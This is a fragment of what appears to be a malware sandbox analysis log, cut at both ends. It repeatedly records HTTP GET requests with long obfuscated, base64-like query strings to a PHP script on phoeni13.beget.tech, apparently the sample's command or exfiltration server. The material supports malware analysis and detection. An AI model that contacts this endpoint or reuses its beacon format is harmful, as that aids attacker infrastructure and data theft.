iBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET 